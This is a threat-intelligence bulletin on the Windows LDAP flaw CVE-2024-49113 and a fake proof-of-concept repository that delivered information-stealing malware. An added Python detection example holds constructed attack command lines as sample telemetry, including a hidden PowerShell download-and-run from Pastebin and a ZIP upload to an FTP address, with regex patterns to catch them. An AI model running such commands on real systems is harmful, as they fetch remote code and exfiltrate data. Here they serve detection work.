2025-01-16

Threat Actors Capitalize on CVE-2024-49113 with Fraudulent Proof-of-Concept Exploit

Level: Tactical | Source: SafeBreach & Trend Micro | Global

Capitalizing on interest in newly disclosed vulnerabilities, threat actors have released a fictitious proof-of-concept (PoC) for CVE-2024-49113 (aka LDAPNightmare), a Denial of Service (DoS) vulnerability affecting Windows Lightweight Directory Access Protocol (LDAP) services. This vulnerability was first detailed in a SafeBreach report published on January 1, 2025, which included a legitimate PoC exploit demonstrating how unpatched Windows servers could be crashed. Adversaries exploited the interest in this issue by introducing a malicious repository on GitHub, disguising information-stealing malware as a fake PoC for CVE-2024-49113. Microsoft addressed this vulnerability in the December 2024 Patch Tuesday update, and organizations are urged to apply the patch promptly. A second, more critical vulnerability, CVE-2024-49112, involving remote code execution (RCE), was also addressed; however, no PoC has been publicly disclosed for CVE-2024-49112. The pair of LDAP vulnerabilities was disclosed by Yuki Chen (@guhe120) on December 10, 2024, as part of the Patch Tuesday update.

As documented by SafeBreach researchers Or Yair and Shahak Morag, CVE-2024-49113 enables remote attackers to crash Windows servers via specially crafted LDAP requests. The exploit relies on an attacker-controlled LDAP server answering queries with manipulated responses, producing a memory access violation in the Local Security Authority Subsystem Service (LSASS) on unpatched Windows servers. The attack flow begins with the attacker sending an RPC request to a domain controller (DC), causing it to query the malicious LDAP server. That server responds with a crafted referral response, triggering out-of-bounds memory access that crashes the LSASS process and forces the system to reboot. SafeBreach demonstrated that the vulnerability can be exploited against any unpatched Windows server with LDAP functionality enabled.

Trend Micro's analysis provided additional insight into the fake PoC, which was designed to lure researchers. According to Trend Micro Threat Hunter Sarah Pearl Camiling, the repository mimicked an authentic Python-based project but contained a suspicious executable file. "Although the repository is seemingly normal at first glance, the presence of the executable raises suspicion due to its unexpected presence in a Python-based project," said Camiling. The malicious repository shipped an executable, "poc.exe," in place of the expected Python scripts. When executed, the file dropped a PowerShell script into the "%Temp%" directory and ran it. That script established persistence by creating a scheduled job that launched further PowerShell commands. These commands downloaded a script from Pastebin, which collected system information (process lists, network configuration, and directory contents) and compressed the data into a ZIP archive. Using hardcoded credentials, the ZIP file was then exfiltrated to an external FTP server.
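The behavior chain above maps cleanly onto process-creation telemetry. The following is an added detection example, not code from the original report or from Trend Micro: it runs a set of stage rules derived from the described chain (PowerShell launched from %Temp%, scheduled job creation, a Pastebin download, ZIP staging, FTP upload) over constructed Sysmon-style events, and flags hosts where several stages co-occur. Hostnames, paths, the job name and the FTP address are assumed sample values.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style); not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "cmd": r"C:\Users\alice\Downloads\LDAPNightmare\poc.exe"},
    {"host": "ws01", "parent": r"C:\Users\alice\Downloads\LDAPNightmare\poc.exe",
     "cmd": r"powershell.exe -ep bypass -w hidden -File C:\Users\alice\AppData\Local\Temp\poc.ps1"},
    {"host": "ws01", "parent": PS,
     "cmd": r"powershell.exe Register-ScheduledJob -Name SysUpdate -ScriptBlock { }"},
    {"host": "ws01", "parent": PS,
     "cmd": r"powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"},
    {"host": "ws01", "parent": PS,
     "cmd": r"powershell.exe Compress-Archive -Path $env:TEMP\collect -DestinationPath $env:TEMP\out.zip"},
    {"host": "ws01", "parent": PS,
     "cmd": r"powershell.exe (New-Object Net.WebClient).UploadFile('ftp://198.51.100.7/out.zip', 'C:\Users\alice\AppData\Local\Temp\out.zip')"},
    # Benign administrative PowerShell on another host; must not trigger the chain.
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "cmd": r"powershell.exe Get-Process | Out-File C:\Users\bob\procs.txt"},
]

# One regex per stage of the fake-PoC chain, matched against the command line.
STAGES = [
    ("powershell_from_temp",  r"powershell.*\\Temp\\.*\.ps1"),
    ("scheduled_job_created", r"(Register-ScheduledJob|schtasks(\.exe)?\s+/create)"),
    ("pastebin_download",     r"pastebin\.com/raw/"),
    ("archive_staging",       r"Compress-Archive"),
    ("ftp_exfil",             r"ftp://|UploadFile\("),
]


def match_stages(events):
    """Return {host: ordered list of distinct stage names seen on that host}."""
    seen = {}
    for ev in events:
        for name, pattern in STAGES:
            if re.search(pattern, ev["cmd"], re.IGNORECASE):
                hits = seen.setdefault(ev["host"], [])
                if name not in hits:
                    hits.append(name)
    return seen


def flag_hosts(events, min_stages=3):
    """Hosts on which at least min_stages distinct chain stages were observed."""
    return {h: s for h, s in match_stages(events).items() if len(s) >= min_stages}
```

Requiring several stages per host keeps a lone Compress-Archive or Pastebin fetch from paging anyone, while the full chain on ws01 is surfaced.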

The CVE-2024-49113 episode illustrates the dual threat posed by the vulnerability itself and by actors who exploit interest in it for their own campaigns. SafeBreach's PoC highlights the significant risk LDAPNightmare poses to critical services, while Trend Micro's analysis of the fake PoC underscores the need for vigilance when using community-shared security tools, so as not to fall victim to misleading repositories.